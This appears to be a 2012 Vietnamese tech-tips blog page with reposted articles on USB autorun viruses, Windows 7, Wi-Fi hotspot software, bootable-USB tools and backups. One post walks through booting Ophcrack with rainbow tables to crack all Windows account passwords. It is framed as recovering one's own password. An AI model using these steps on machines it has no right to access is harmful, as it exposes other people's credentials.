• This is slide 1 description. Go to Edit HTML of your blogger blog. Find these sentences. You can replace these sentences with your own words.
  • This is slide 2 description. Go to Edit HTML of your blogger blog. Find these sentences. You can replace these sentences with your own words.
  • This is slide 3 description. Go to Edit HTML of your blogger blog. Find these sentences. You can replace these sentences with your own words.
  • This is slide 4 description. Go to Edit HTML of your blogger blog. Find these sentences. You can replace these sentences with your own words.
  • This is slide 5 description. Go to Edit HTML of your blogger blog. Find these sentences. You can replace these sentences with your own words.

Thứ Hai, 30 tháng 1, 2012

Mẹo vặt sử dụng USB


Hiện nay Usb là công cụ lưu trữ ngoài thông nhất, mình thấy bài này hay nên post lại hi vọng nó có ích .

Thiết bị này cũng là công cụ lây lan virus rất phổ biến nhưng chỉ cần một cách mở khác bạn có thể ngăn chặn được. Trang trí USB theo phong cách riêng của mình bằng biểu tượng và hình nền cũng là một chiêu thú vị.

Hạn chế sự lây lan của virus

Theo nguyên tắc hoạt động của một số virus lây lan qua đường USB thì chúng sẽ nhanh chóng tạo trong đó một số file như autorun.inf hoặc desktop.ini để gọi một số tập tin thực thi đi kèm.

Tuy nhiên, có một điều virus không thể nào tự chạy được khi ta vừa cắm USB vào máy. Thao tác nhấp đúp vào ổ đĩa flash trong My Computer sẽ giúp các file virus được kích hoạt và bắt đầu lây lan sang máy tính.

Chỉ một thao tác đơn giản click chuột phải USB và chọn Explorer là ta có thể chặn được bước xâm nhập này của virus vào máy. Các tập tin autorun hoàn toàn mất tác dụng.

Bước tiếp theo ta chỉ cần mở autorun.inf có trong USB bằng Notepad để xem tên những file virus và xóa chúng đi. Ta xóa luôn cả file autorun.inf.

Nên tắt USB trong máy trước khi rút ra

Thao tác này sẽ giảm sự xung đột điện với chip nhớ của USB. Việc rút USB ra cách đột ngột sẽ cắt đứt bất ngờ nguồn điện đang cấp cho USB, quá trình truyền dẫn dữ liệu đang diễn ra bị ngăt quãng làm ảnh hưởng đến chip nhớ.

Nhưng nhiều trường hợp việc rút USB luôn gặp thông báo sau
Thông báo thường thấy khi tắt USB mà vẫn còn file đang sử dụng trên nó.

Nhiều người vội vã nên không thể kiên trì với dòng thông báo này đành rút nó thiết bị này ra khỏi máy. Trường hợp này có thể do virus đang chạy trong ổ flash hoặc bạn còn đang mở một file nào đó trên USB. Kiểm tra xem các chương trình đang thực thi như office, trình ứng dụng…

Nếu qua bước này cũng vẫn gặp thông báo thì nguy cơ bạn nhiễm virus rất cao hoặc cổng giao tiếp USB của máy đã bị lỗi.

Eject USB nhiều lần nếu việc rút USB gặp lỗi
Không nên vội vã rút ra ngay mà click phải ổ USB chọn Eject vài lần. Câu thông báo hiện ra bạn nhấp Continue và rút nó ra. Dữ liệu có thể bị mất nhưng USB sẽ không bị sốc điện.

Cảnh báo dữ liệu sẽ bị mất nếu rút USB ra. Bạn chọn Continue để tiếp tục.

Làm đẹp cho cửa sổ USB nhưng cũng là công cụ báo động virus hữu hiệu.

Trước tiên, ta cần nắm vững các chức năng cơ bản của một số tập tin sau:

- autorun.inf: thiết lập thông tin về icon, virus thường tấn công chỉnh sửa file này để điều khiển kích hoạt virus chạy.

- desktop.ini: thiết lập desktop, virus cũng hay dùng file này để gọi 1 số file thực thi chứa virus.

- doan.ico: file biểu tượng của USB.

- bgusb4.jpg: file hình nền.

- Bạn cũng có thể tạo thêm một file sao lưu thiết lập autorun.inf để phòng khi bị virus ví dụ này đặt tên là bk-autorun.inf.

Màn hình cửa sổ USB được cài đặt hình nền riêng.

Để tạo biểu tượng (icon) cho USB, bạn cần thiết kế sẵn một file biểu tượng có đuôi .ico. Icon có thể vẽ bằng phần mềm hỗ trợ hoặc tìm trên mạng những hình ưu thích.

Bạn dùng ứng dụng Notepad tạo một file có tên autorun.inf đặt tại thư mục gốc của USB có nội dùng như sau:

[AutoRun]
icon=doan.ico

Trong đó, doan.ico là file biểu tượng do bạn tự chọn hoặc tải về. Doan.ico cũng phải đặt ngoài thư mục gốc USB. Như vậy, là bạn có thể phân biệt USB của mình với biểu tượng riêng ở đầu khi cắm vào máy.

Làm hình nền (background) cho USB:

Tương tự, bạn cũng tạo một file có tên desktop.ini đặt cùng vị trí như các tập tin trên với nội dung sau:

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=bgusb4.jpg
IconArea_Text=0x030291F
[.ShellClassInfo]
ConfirmFileOp=0

bgusb4.jpg là file ảnh ở định dạng JPG chọn làm hình nền.

Bạn nên tạo USB của bạn có 1 icon, để có thể dễ dàng nhận biết được USB của mình có bị nhiễm virus hay chưa.


USB có tên bodaudinh với biểu tượng ở đầu.

Khi đã tạo cho USB của mình 1 icon riêng, thì bạn đã fải dùng đến file autorun.inf. Và khi bạn nhiễm virus, thì thường virus sẽ chỉnh sửa cái file autorun.inf thiết lập icon của bạn rồi thay vào đó bằng những đoạn mã để gọi file virus thực thi. Khi bạn cắm USB vào máy mà không thấy có biểu tượng quen thuộc thì khả năng bị nhiễm virus trong USB là rất cao.

Trần Nguyễn (Ảnh chụp màn hình)
Nguồn vnexpress.net

Windows 7

Windows 7 (từng có tên mã là Blackcomb và Vienna) là thế hệ hệ điều hành kế tiếp của dòng họ hệ điều hành Microsoft Windows, được phát triển bởi hãng phần mềm Microsoft dành cho các loại máy tính cá nhân, bao gồm máy tính để bàn, xách tay, Tablet PC, netbook và các máy tính trung tâm phương tiện (media center PC) cho gia đình hoặc doanh nghiệp, sẽ được phát hành trên toàn thế giới vào ngày 22/10/2009.

Microsoft tuyên bố trong năm 2007 rằng họ đang lên kế hoạch phát triển Windows 7 trong khoảng thời gian 3 năm bắt đầu từ sau khi thế hệ tiền nhiệm của nó được phát hành, Windows Vista. Microsoft cũng tuyên bố thời điểm phát hành cuối cùng sẽ được quyết định dựa trên chất lượng của sản phẩm này.

Không giống hệ điều hành tiền nhiệm, Windows 7 là một bản nâng cấp lớn hơn từ Vista, với mục đích có thể tương thích đầy đủ với các trình điều khiển thiết bị, ứng dụng, và phần cứng đã tương thích với Windows Vista. Những giới thiệu về hệ điều hành này của Microsoft trong năm 2008 tập trung vào khả năng hỗ trợ tiếp xúc đa điểm, một Windows Shell mới được thiết kế lại với một taskbar mới, một hệ thống mạng gia định có tên gọi HomeGroup, và các cải tiến về hiệu suất. Một số ứng dụng đi kèm trong những thế hệ trước của Microsoft Windows, điển hình nhất là Windows Movie Maker và Windows Photo Gallery, không có sẵn trong hệ điều hành này; thay vào đó, chúng được cung cấp riêng rẽ (miễn phí) như một phần của bộ Windows Live Essentials.

Quá trình phát triển:

Ban đầu, một phiên bản Windows mang tên mã Blackcomb được dự định là phiên bản kế tiếp của Windows XP và Windows Server 2003. Những tính năng mới cơ bản được thiết kế cho Blackcomb bao gồm điểm nhấn trong khả năng tìm kiếm và truy vấn dữ liệu, và một hệ thống lưu trữ cấp tiến mang tên WinFS nhằm phục vụ cho kế hoạch này. Nhưng sau đó, Blackcomb bị trì hoãn dẫn đến hãng phải công bố một bản phát hành quá độ nhỏ hơn có tên mã "Longhorn" vào năm 2003. Tuy nhiên, đến giữa năm 2003, Longhorn đã đạt được một số tính năng nguyên được dự định dành cho Blackcomb. Sau khi ba loại virus khai thác được lỗ hổng ở các hệ điều hành Windows trong một khoảng thời gian ngắn năm 2003, Microsoft đã thay đổi ưu tiên phát triển bản phát hành này, hoãn lại một số thành quả phát triển chính của Longhorn nhằm phát triển một bản vá dịch vụ (service pack) mới cho Windows XP và Windows Server 2003. Quá trình phát triển Longhorn (Windows Vista) được tái khởi động vào tháng 9 năm 2004.

Đầu năm 2006, Blackcomb được đổi tên thành Vienna, và một lần nữa thành Windows 7 vào năm 2007.[3] Năm 2008, Microsoft công bố Windows 7 cũng sẽ là tên chính thức của hệ điều hành này. Bản phát hành ra bên ngoài đầu tiên dành cho các đối tác của Microsoft được đưa ra vào tháng 1 năm 2008 có tên phiên bản Milestone 1 (build 6519).

Bill Gates trong một cuộc phỏng vấn với Newsweek, đã cho biết phiên bản kế tiếp của Windows sẽ "chú tâm hơn vào người dùng". Gates còn cho biết Windows 7 cũng sẽ tập trung vào việc cải thiện hiệu suất làm việc; Steven Sinofsky sau đó đã mở rộng điểm này, giải thích trên blog Engineering Windows 7 (Công trình Windows 7) rằng hãng đang sử dụng nhiều công cụ truy vấn mới để đo hiệu suất của nhiều phân vùng thuộc hệ điều hành dựa trên cơ sở thực tế, giúp xác định vị trí những đoạn mã kém hiệu quả từ đó ngăn chặn sự suy giảm hiệu suất.

Phó Chủ tịch có thâm niên của Microsoft Bill Veghte tuyên bố Windows 7 sẽ không có những vấn đề về khả năng tương thích đối với Windows Vista như Vista từng có đối với các phiên bản trước đó. Nói về Windows 7, ngày 16 tháng 10 năm 2008, Giám đốc điều hành Microsoft Steve Ballmer cũng một lần nữa khẳng định sự tương thích giữa Vista và Windows 7. Ballmer còn xác nhận mối liên hệ giữa Vista và Windows 7, chỉ ra rằng Windows 7 chính là một phiên bản cải tiến của Vista.

Ngày 27 tháng 12 năm 2008, Windows 7 Beta đã bị rò rỉ trên Internet. Theo như một bài kiểm thử hiệu suất thực hiện bởi ZDNet, Windows 7 Beta đã vượt trội so với cả Windows XP và Vista trên nhiều phần then chốt, như về thời gian khởi động và tắt máy, làm việc với các tệp tin và tải các tài liệu; ngoài ra, còn vượt trội về các tiêu chuẩn PC Pro đối với các hoạt động văn phòng điển hình, biên tập video, còn lại đều tương đồng với Vista và chậm hon Windows XP. Ngày 7 tháng 1 năm 2009, phiên bản 64-bit của Windows 7 Beta (build 7000) cũng bị rò rỉ trên nhiều trang web.

Bản beta chính thức, được công bố tại hội chợ CES 2009, được thiết kế cho hai người mua là MSDN và TechNet vào ngày 7 tháng 1 năm 2009 và được rút gọn cho cộng đồng tải về dùng thử tại Microsoft TechNet vào ngày 9 tháng 1 năm 2009 trước khi bị thu hồi và thay thế bằng thông điệp sẽ sớm có mặt. Các máy chủ đã gặp phải khó khăn trước số lượng đông đảo người dùng muốn tải về dùng thử bản beta, mặc dù hãng rõ ràng có nhiều kinh nghiệm trong vấn đề này. Microsoft đã đưa thêm vào các máy chủ phụ để đáp ứng khối lượng nhu cầu khổng lồ từ cộng đồng người dùng. Do nhu cầu cao hơn dự tính, Microsoft đã quyết định loại bỏ giới hạn chỉ cho phép 2,5 triệu lượt tải ban đầu và cho phép cộng đồng tải về đến hết 24 tháng 1 năm 2009, rồi một lần nữa gia hạn đến ngày 10 tháng 2.Còn đối với các tệp tin DVD image còn đang được tải về dang dở hoặc bị tạm dừng có thể tải tiếp tục đến ngày 12 tháng 2.

Người dùng vẫn có thể tải về Windows 7 thông qua chương trình kết nối Microsoft. Phiên bản tiếp theo xuất hiện sau bản beta là RC có mã 7100 hiện cho tải về đến hết 20 tháng 8 năm 2009. Windows 7 chỉ có duy nhất 1 bản RC, không giống như dự đoán của nhiều người. Mới nhất, trên mạng đã rò rỉ phiên bản RTM (Release To Manufacture) có mã 7600. Đây là phiên bản được Microsoft phân phối đến các công ty máy tính để bán lẻ, nhưng cũng đã bị một số hacker tung lên mạng. Đầu tiên là bản RTM tiếng Trung Quốc, rồi không lâu sau là các phiên bản của các ngôn ngữ phổ thông khác như Anh, Pháp, Nga cũng đã xuất hiện đầy rẫy. Cho đến thời điểm này, việc tải về một phiên bản Windows 7 RTM còn dễ hơn cả các bản trước của nó. Phiên bản RTM này đã hoàn toàn hoàn thiện các tính năng, ít xung đột hơn so với bản Beta và RC.

Không chỉ có 3 mã sản phẩm Windows 7 được biết đến, mà trên mạng còn tồn tại rất nhiều phiên bản có mã khác nhau của Windows 7 như 6068, 7057, 7077, 7201, 7300, 7260,... Đây đều là các bản thử nghiệm tiếp theo của Microsoft đối với Windows 7 nhưng họ không có tuyên bố chính thức. Những phiên bản mang mã hiệu này được phân phối cho một số lượng rất giới hạn các cá nhân đã được lựa chọn. Các phiên bản này phản ánh những gì diễn ra trên Windows 7 trước khi các bản chính thức là 7000, 7100 và 7600 ra đời.

Microsoft đã ấn định ngày phát hành chính thức của Windows 7 là vào ngày 22 tháng 10 năm 2009 trên toàn thế giới. Ngày 24 tháng 7 năm 2009 tại Việt Nam, nhân buổi công bố bản Windows 7 RTM đã đến tay các nhà sản xuất máy tính Việt Nam, Microsoft Việt Nam cũng chính thức thông báo rằng Việt Nam cũng sẽ không lỗi hẹn với Windows 7, chúng ta cũng sẽ được sở hữu hệ điều hành này vào ngày 22 tháng 10 năm 2009.

Windows 7 sẽ bao gồm các phiên bản sau, gần giống với Windows Vista:

-Starter: Phiên bản rút gọn các tính năng cao cấp, không cầu kì về giao diện, gọn nhẹ, thích hợp với các máy netbook, hướng tới đối tượng là người mua mới netbook, người mới làm quen với máy vi tính, người có thu nhập thấp

-Home Basic: Lược bỏ một số các chức năng giải trí nâng cao (như Media Center) ở bản Home Premium, thích hợp với các loại netbook, máy tính cá nhân, công ty vừa và nhỏ, hướng tới đối tượng là người mua mới netbook, gia đình có thu nhập trung bình

-Home Premium: Đầy đủ các chức năng giải trí, các chức năng văn phòng và kết nối ở mức trung bình khá, thích hợp với các máy netbook thế hệ mới, máy tính cá nhân (PC), máy tính xách tay (Laptop), hướng tới người sử dụng là các hộ gia đình, công ty vừa và nhỏ

-Professional: Các chức năng kết nối mạng văn phòng cũng như kết nối mạng Quốc tế đầy đủ, hướng tới các công ty lớn, các doanh nhân thường xuyên làm việc với máy vi tính để trao đổi dữ liệu

-Ultimate và Enterprise: Tập hợp đầy đủ các chức năng của tất cả các phiên bản kia cộng lại, giúp người dùng có được một sức mạnh toàn năng trong trao đổi thông tin và giải trí mọi lúc mọi nơi, hướng tới các cá nhân, tổ chức muốn một giải pháp trọn vẹn cho việc hoạt động máy vi tính của họ. Điểm khác biệt gần như duy nhất của Ultimate và Enterprise là khả năng trao đổi, kết nối cả một tổ chức của Enterprise linh hoạt hơn Ultimate. Vì vậy, Ultimate hướng đến các cá nhân sử dụng, còn Enterprise hướng vào môi trường có tính chất cộng đồng, tương tự như Professional

Yêu cầu phần cứng:

Cấu hình khuyến cáo cho Windows 7:
Tốc độ vi xử lý 1 GHz (32-bit hoặc 64-bit)
Bộ nhớ (RAM) 1 GB
Card đồ họa DirectX 9.0
Bộ nhớ đồ họa 128 MB (để dùng được Windows Aero)
Không gian ổ cứng 16 GB
Các ổ đĩa khác DVD-ROM
Âm thanh Âm thanh ra

Chủ Nhật, 29 tháng 1, 2012

Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi


Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi
Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi

Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi

Thứ Bẩy, 28/01/2012, 07:00 AM (GMT+7)
Chiếc máy tính hay laptop chạy Windows 7 có thể biến thành điểm truy cập Wifi một cách dễ dàng với phần mềm MyPublicWiFi. Trước đây, người dùng đã có thể chia sẻ kết nối Internet thông qua WiFi cho các thiết bị như laptop hay smartphone thông qua phần mềm MaryFi. Tuy nhiên, MariFi lại không cung cấp các tùy chọn để sử dụng tường lửa bảo vệ mạng.
MỜI CÁC BẠN ĐÓN ĐỌC NHỮNG BÀI VIẾT CHỌN LỌC VỀ VI TÍNH VÀ INTERNET, THỦ THUẬT VÀO LÚC 7H30, 13H, VÀ 16H CÁC NGÀY TRONG TUẦN, TẠI 24H.COM.VN
Nhưng MyPublicWiFi lại hoàn toàn khắc phục điều đó. Đây là một phần mềm dễ sử dụng có thể biến máy tính hay laptop của bạn thành một điểm truy cập WiFi không dây. Bất cứ ai gần đó có thể lướt Internet thông qua mạng chia sẻ của bạn. Đây cũng là một giải pháp lý tưởng cho việc thiết lập một điểm truy cập tạm thời trong một căn phòng khách sạn, phòng họp, tại nhà hoặc các loại tương tự.
MyPublicWiFi-Firewall cũng cho phép hạn chế người dùng truy cập đến các máy chủ cụ thể. Bạn cũng có thể ngăn chặn việc sử dụng các dịch vụ Internet nhất định (ví dụ như chương trình chia sẻ tập tin). MyPublicWiFi cho phép bạn ghi lại và theo dõi tất cả các trang URL truy cập ảo của bạn WiFi-Hotspot.
Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi, Công nghệ thông tin, Truy cap wifi mien phi, MyPublicWiFi, phan mem MyPublicWiFi, Wi-Fi, WiFi-Hotspot,
MyPublicWiFi dễ sử dụng, bạn chỉ cần tải xuống và cài đặt nó từ trang chủ, sau đó đặt tên và mật mã cho mạng Wi-Fi của bạn rồi bấm vào nút Setup up and Start Hotspot để các thiết bị khác có thể truy cập mạng Wi-Fi của bạn.
Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi, Công nghệ thông tin, Truy cap wifi mien phi, MyPublicWiFi, phan mem MyPublicWiFi, Wi-Fi, WiFi-Hotspot,
Nếu bạn có đặt password, khi truy cập vào mạng Wi-Fi chương trình sẽ yêu cầu nhập mật khẩu. Như vậy, bạn sẽ kích hoạt WiFi-Hotspot, cho phép người dùng kết nối các máy tính hoặc các thiết bị di động khác (như Android hay iOS).
Biến máy tính thành điểm truy cập Wifi miễn phí với MyPublicWiFi, Công nghệ thông tin, Truy cap wifi mien phi, MyPublicWiFi, phan mem MyPublicWiFi, Wi-Fi, WiFi-Hotspot,
Để thiết lập cấu hình với các tùy chọn bổ sung, bạn vào thẻ tab Management (Quản lý). Tại đây, người dùng có thể kích hoạt tường lửa (Firewall), URL Log và cuối cùng lựa chọn MyPublicWiFi để bắt đầu khởi động hệ thống. Bạn đọc có thể tải MyPublicWiFi tại đây.

Thứ Bảy, 28 tháng 1, 2012

Khôi phục password Windows với Ophcrack

Hiện tại, trên các diễn đàn và website IT đã có rất nhiều bài viết về cách crack mật khẩu khi bạn vô tình quên mất password đăng nhập. Và hầu hết các phương pháp đó đều dựa trên đĩa Hiren Boot, Ubuntu Live CD… nhưng điều gì sẽ xảy ra khi bạn không thể khôi phục được mật khẩu? Trong bài viết sau đây, Tôi sẽ giới thiệu với các bạn 1 phương pháp khác sử dụng công cụ hỗ trợ Ophcrack

Trước tiên, các bạn cần truy cập vào trang chủ của Ophcrack và tải file CD image tại đây:
Sau đó ghi file *.iso này ra đĩa CD bằng bất kỳ chương trình hỗ trợ nào như ImgBurn, UltraISO, Nero... :
Nếu bạn muốn sử dụng trên máy tính không có ổ CD/DVD thì nên dùng công cụ hỗ trợ PenDrive Linux để tạo USB boot. Khi sử dụng USB boot thì tốc độ và hiệu suất làm việc sẽ được cải thiện khá nhiều, hoặc bạn có thể sao lưu dữ liệu trực tiếp ngay trên USB đó:
Để tạo ổ USB boot hỗ trợ tất cả các phiên bản Windows, hãy tải table password miễn phí miễn phí tại đây. Lưu ý rằng tại đây có 2 loại table miễn phí và trả phí, đương nhiên bản trả phí sẽ hoạt động nhanh và đa dạng hơn nhiều so với bản miễn phí, nhưng bù lại, dung lượng của các bản này cũng hoàn toàn khác xa nhau. Do chỉ sử dụng trên USB nên chúng ta chỉ cần bản Vista với dung lượng khoảng 461 MB:
Sau đó giải nén file table này vào thư mục \tables\vista_free trên USB và chúng sẽ tự động sử dụng bởi Ophcrack:

Boot từ CD/USB 

Đây là giao diện chính sau khi các bạn boot từ CD/USB:
Chọn chế độ automatic và Ophcrack sẽ tự động dò tìm, phá các mật khẩu của tất cả tài khoản trên máy tính. Lưu ý rằng nếu máy tính khởi động nhưng bạn chỉ thấy màn hình trống hoặc Ophcrack không hoạt động, hãy khởi động lại và điều chỉnh bộ nhớ RAM cấp phát cho chương trình trong mục Option từ Boot Menu:
Tùy vào độ phức tạp, dài ngắn của mật khẩu mà quá trình crack sẽ diễn ra nhanh hoặc chậm, và với table free được download tại bước trên thì có thể password sẽ không bao giờ tìm được. Một khi quá trình này hoàn tất, bạn sẽ thấy chi tiết password, ghi lại và sau đó sẽ khởi động lại máy. Hoặc nếu không xử lý được trên 1 tài khoản nào đó, bạn hãy đăng nhập vào account quản trị và dùng quyền thiết lập để xóa bỏ password ở bên trong Windows:
Trên đây là 1 cách khác để bạn lấy lại mật khẩu Windows bên cạnh những phương pháp phổ biến hiện nay, trong trường hợp bạn không sử dụng ổ cứng đã mã hóa dữ liệu và mật khẩu không quá phức tạp. Chúc các bạn thành công!

Read more: http://windowsz.net/f29/khoi-phuc-password-windows-voi-ophcrack-13827.html#ixzz1koRzmWf5

20 phương pháp tạo USB boot tốt nhất


20 phương pháp tạo USB boot tốt nhất

QuanTriMang - Đã bao giờ bạn muốn tạo ổ USB boot được trên hệ điều hành Windows, Linux hoặc bất kì ổ ISO nào? Nếu vậy, dưới đây là danh sách những phần mềm có thể giúp người dùng tạo ổ USB. USB này có chứa file cài đặt hệ điều hành Windows, Linux CD, đĩa boot Ultimate, Hiren’s Boot CD, Antivirus Rescue CD,...

Tạo USB boot Windows

1 - WinToFlash:

Như bạn có thể thấy ở bản chụp màn hình phía dưới, đây là phần mềm dễ nhất bạn có thể sử dụng để tạo đĩa boot Windows. Nó tạo phiên bản boot của hệ điều hành windows xp/2003 , winPE XP/2003 , Windows vista/2008/7/8 và các hệ điều hành khác.
WinToFlash

2 - Windows 7 USB/DVD download tool:

Windows 7 USB/DVD download tool được tạo bởi chính Microsoft với mục đích dễ dàng tạo ổ USB boot hoặc ghi file ISO Windows 7 ra đĩa DVD.

3 - A Bootable USB:

A Bootable USB là ứng dụng nhỏ gọn, cho phép người dùng cài đặt windows vista/2008/7 từ ổ USB.

4 - A Bootable USB (cung cấp bởi Askvg.com):

Tên phần mềm này có vẻ giống với phần mềm bên trên. Tuy nhiên, nó lại có thêm một vài lựa chọn khác nữa và làm việc với phiên bản x64 của hệ điều hành Windows.
A Bootable USB

5 - Setup from USB:

Đây là ứng dụng đơn giản những rất dễ sử dụng để tạo ổ windows vista/7 USB boot được. Tuy nhiên, khi sử dụng ứng dụng này, người dùng cần phải có .NetFramework 4.

6 - OStoGO:

Một ứng dụng nhỏ gọn để chuyển đĩa windows vista/7 DVD sang ổ USB.

7 – RMPrepUSB:

Công cụ tiên tiến để tạo ổ USB boot Windows. Dẫu vậy, người dùng nên sử dụng ứng dụng này cẩn thận.

8 -  WinSetupFromUSB:

Một ứng dụng tốt nhưng khi sử dụng nên cẩn thận. WinSetupFromUSB người dùng tạo ổ USB Windows hoặc Linux boot được. Bên cạnh đó, nó còn cho phép người dùng thử trong QEMU.
WinSetupFromUSB

9 -  FlashBoot:

Một phần mềm khá hay, có thể chuyển Windows XP/Vista/7 vào ổ USB. Phần mềm này có giá khoảng $38 USD.

Tạo MultiBootable USB

10 - YUMI – (Your Universal Multiboot Installer):

YUMI có thể dùng để tạo ổ MultiBootable USB với nhiều hệ điều hành, công cụ diệt virus, công cụ khôi phục,... Sử dụng Syslinux. Một tính năng khá thú vị khác của phần mềm này là nó có thể download file ISO trước khi sử dụng nó trên ổ USB.

11 – XBoot:

XBoot là phần mềm khá hay, có khả năng tạo Multiboot USB/ISO dành cho Linux, Live CDs, Antivirus Utilities,… Một tính năng khá hữu ích của Xboot là nó cho phép người dùng kiểm tra USB đã tạo ngay trong Windows.

12- SARDU:

SARDU là phần mềm có thể tạo Multibootable ISO và ổ USB. Ổ này có chứa một vài phần mềm diệt virus, các công cụ, phiên bản hiện hành của Linux và Windows. Tất cả những gì bạn cần làm chỉ là chuyển file ISO vào folder ISO và thưởng thức nó trên ổ USB.
SARDU

Tạo Linux và các ổ USB boot khác

13 -  Universal USB Installer :

Đây là ứng dụng khá hữu ích, giống với YUMI, ngoại trừ việc nó không hỗ trợ MultiBoot. Tuy nhiên, nó lại hỗ trợ rất nhiều phiên bản của Linux, công cụ diệt virus, Windows Vista, Windows 7, Hiren’s Boot CD,…. Bên cạnh đó, phần mềm này còn hỗ trợ download file ISO cho người dùng.

14 - LiveUSB Install:

Một ứng dụng nhỏ gọn người dùng có thể sử dụng để tạo ổ Linux boot được (với rất nhiều phiên bản được hỗ trợ cùng với một vài công cụ diệt virus, cứu ổ cứng,...). Người dùng còn có một số lựa chọn khác, bao gồm khả năng ghi file .img ra ổ USB.

15 - UNetbootin:

Unetbootin là ứng dụng dành cho Windows, Linux và Mac OS X. Ứng dụng này còn hỗ trợ download file ISO giúp người dùng. Nó hỗ trợ rất nhiều phiên bản, công cụ diệt virus,.... Ngoài ra, Unetbootin còn hỗ trợ tạo ổ USB boot được cho dù phiên bản nào đang được sử dụng đi nữa.

16 - MultiSystem (Linux):

Ứng dụng này chỉ dành cho Linux người dùng có thể dùng để tạo ổ USB Linux boot được.
MultiSystem

17 – Fedora LiveUSB Creator:

Một ứng dụng nhỏ gọn sẽ giúp người dùng chuyển file Fedora ISO sang ổ USB.

18 - CD 2 USB:

CD 2 USB là công cụ có đôi chút giống với lệnh, có thể tạo ổ USB boot cho Ubuntu. Ứng dụng này không format ổ USB và cài đặt bootloader lên ổ.

19 - ISO to USB:

ISO to USB là ứng dụng đơn giản, có thể tạo ổ USB boot được từ file Bootable ISO.

20 - ISO2Disc:

ISO2Disc là công cụ nhỏ gọn, có khả năng ghi file ISO ra đĩa CD/DVD hoặc ổ USB Flash.
ISO2Disc
Lamle (Theo Tipsotricks)

SAO LƯU DỮ LIỆU VÀ TOÀN BỘ HỆ THỐNG VỚI EASEUS TODO BACKUP


SAO LƯU DỮ LIỆU VÀ TOÀN BỘ HỆ THỐNG VỚI EASEUS TODO BACKUP
(09/01/2010)
Easeus Todo Backup là tiện ích miễn phí, cho phép người dùng sao lưu toàn bộ hệ thống, tạo bản sao của từng phân vùng hoặc của cả ổ cứng, giúp khôi phục an toàn dữ liệu và Windows trong trường hợp hệ thống bị lỗi hay có hỏng hóc với thiết bị phần cứng…
Easeus Todo Backup cũng rất hữu ích trong trường hợp bạn chuyển sang sử dụng máy tính mới hoặc chuyển qua ổ cứng mới mà không cần phải cài đặt lại hệ điều hành hoặc các phần mềm đã có trên đó.

Download EASUS Todo tại đây.

Lưu ý: Sau khi cài đặt, khởi động lại hệ thống để sử dụng chương trình.

Ngay tại giao diện chính, bạn có thể thấy đầy đủ các tính năng mà chương trình cung cấp, trong đó có thể kể đến 3 tính năng chính bao gồm: Backup (sao lưu), Restore (khôi phục) và Clone Disk (tạo bản sao ổ cứng).




Sao lưu: thực hiện sao lưu hệ thống bằng cách nhấn vào mục Backup trên giao diện chính. Tại màn hình hiện ra tiếp theo, đánh dấu chọn những phân vùng mà mình muốn thực hiện việc sao lưu dữ liệu có trên đó. Trong trường hợp chỉ muốn sao lưu Windows, bạn chỉ việc chọn phân vùng ổ đĩa C là đủ.



Lưu ý: việc sao lưu đồng thời càng nhiều phân vùng sẽ khiến file sao lưu được có dung lượng rất lớn. Do vậy, bạn chỉ nên tiến hành sao lưu lần lượt từng phân vùng.

Bước tiếp theo, bạn chọn vị trí để lưu file sao lưu được. Bạn có thể chứa file này trên ổ cứng gắn ngoài, nhưng không thể chứa chúng trên cùng phân vùng đang tiến hành quá trình sao lưu.

File sao lưu là file dưới dạng ảnh (image), chứa toàn bộ các thông tin và dữ liệu có trên phân vùng đó, và chỉ có thể sử dụng được bởi chính EASEUS Todo Backup để đọc và khôi phục lại.


Bước cuối cùng, đặt tên file image và nhấn nút Proceed để quá trình sao lưu diễn ra. Thời gian thực hiện quá trình dài hay ngắn phụ thuộc vào dung lượng của phân vùng.


Phục hồi: Để phục hồi lại dữ liệu từ file sao lưu đã có được, quá trình thực hiện tương tự như trên. Nhấn vào nút Restore trên giao diện chính, tìm đến vị trí chứa file image mà bạn sao lưu được từ trước (file có định dạng pbd), và cuối cùng, chọn phân vùng ổ đĩa muốn tiến hành khôi phục dữ liệu lên đó.

Lưu ý: ổ đĩa chọn để khôi phục dữ liệu cần phải có dung lượng lớn hơn hoặc bằng dữ liệu có trong file backup từ trước.

Clone Disk: là tính năng tạo bản sao của cả ổ đĩa. Tính năng này hữu dụng trong trường hợp máy tính có gắn 2 ổ đĩa khác nhau, hoặc khi bạn mua một ổ đĩa mới và muốn chuyển toàn bộ dữ liệu từ ổ đĩa cũ sang ổ đĩa mới đó. Quá trình tiến hành hoàn toàn tương tự như trên.

Điểm khác biệt cơ bản giữa tính năng Backup và Clone Disk, đó là với Backup, bạn có thể chọn để sao lưu từng phân vùng hoặc chỉ sao lưu Windows, nhưng với Clone Disk, bạn sẽ phải tiến hành sao lưu toàn bộ những gì có trên đĩa cứng, nên sẽ mất nhiều thời gian hơn.

Trên đây là các tính năng chính mà EASEUS Todo Backup cung cấp cho bạn. Ngoài ra, phần mềm còn cung cấp các tính năng để tạo đĩa khởi động, tạo phân vùng ảo và một vài tính năng hữu ích khác mà bạn có thể dần khám phá trong quá trình sử dụng.

Lưu ý: Bạn nên thường xuyên và định kỳ sao lưu dữ liệu và hệ thống trên ổ cứng để đề phòng các lỗi hệ thống hoặc phần cứng xảy ra bất ngờ. Tốt nhất, nên dành riêng một phân vùng để chứa các dữ liệu sao lưu được.

Thứ Bảy, 21 tháng 1, 2012

Kết nối 2 máy Laptop với nhau bằng Wireless

Kết nối 2 máy Laptop với nhau bằng Wireless
Các máy vi tính xách tay (Laptop) thường có sẵn thiết bị truy cập mạng không dây (Wireless, WIFI) dùng để kết nối Internet. Tuy nhiên bạn cũng có thể dùng thiết bị này để nối mạng 2 hoặc nhiều máy Laptop với nhau để sao chép dữ liệu, sử dụng chung các ổ dĩa của nhau...

Nếu Laptop của bạn không có thiết bị mạng không dây thì có thể gắn thêm, xem hướng dẫn cách gắn thêm thiết bị mạng không dây cho Laptop.

Để tạo kết nối cho 2 máy Laptop bạn chỉ cần làm trên một máy, máy còn lại sẽ tự động nhận biết và kết nối mạng, sau đây là phần hướng dẫn kết nối 2 máy Laptop với nhau bằng Wireless trên Windows XP SP2:

